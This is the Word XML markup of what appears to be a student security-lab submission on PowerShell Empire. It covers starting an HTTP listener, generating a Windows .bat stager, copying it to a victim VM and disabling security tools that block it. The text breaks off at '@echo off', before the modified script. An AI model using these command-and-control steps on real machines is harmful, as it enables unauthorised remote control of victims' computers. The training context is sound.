    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="72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190750" cy="17145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907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00" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the listener HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="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info</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> prints information about your listener. Key attributes to take notice of include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BindIP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="600" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:spacing w:after="6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24892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3"/>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set Name</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> can change the name of your listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="72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914775" cy="4191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9147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300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the Name to “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpListener</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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set Port [number]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> can change the port number of your listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="72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324225" cy="352425"/>
            <wp:effectExtent b="0" l="0" r="0" t="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3242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300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the Port to “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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execute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will run the listener; a listener must be running in order to capture inbound data from the victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="72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3600450" cy="647700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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600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300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute to start our listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once your listener is up and running on a given port and protocol, proceed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="320" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_az9qjxniivf2" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="320" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dvry4emq5p6y" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 3: Setup a Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, it’s time to setup a stager. Generate </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">launcher.bat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, copy it to the victim host, then run it from the terminal (you won’t see the output if you run it in File Explorer). If you encounter security systems blocking the execution of the script, feel free to disable those systems (and ensure they remain disabled, and don’t turn themselves back on…), but remember to document any such actions in your submission. You should see the connection established to the victim PC and be able to interact with it via the Empire shell. Here are some useful commands you can use (again, note that these are not sequential lab instructions):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usestager [stager]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command will setup a stager for use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="600" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usestager windows/launcher bat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> then type </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:spacing w:after="600" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pP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3248025" cy="3810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2480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600" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a stager that will be a windows .bat file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:spacing w:after="600" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pP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5091113" cy="3052976"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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091113" cy="305297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Outfile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is where the stager will be saved, which you can change</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5048250" cy="4572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0482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00" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Changed the file name to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">batman</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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set Listener test</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> then </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">info</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will show the updated listener name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="72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238750" cy="3429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2387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00" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the listener for this stager that will be our previously created listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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execute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> gives “Stager output written out to: /tmp/launcher.bat”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:spacing w:after="3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457200"/>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00" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">execute to create the stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:spacing w:after="3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24525" cy="1000125"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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245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300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Had to modify the bat script to be able to run it on the victim VM </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modified script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">@echo off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
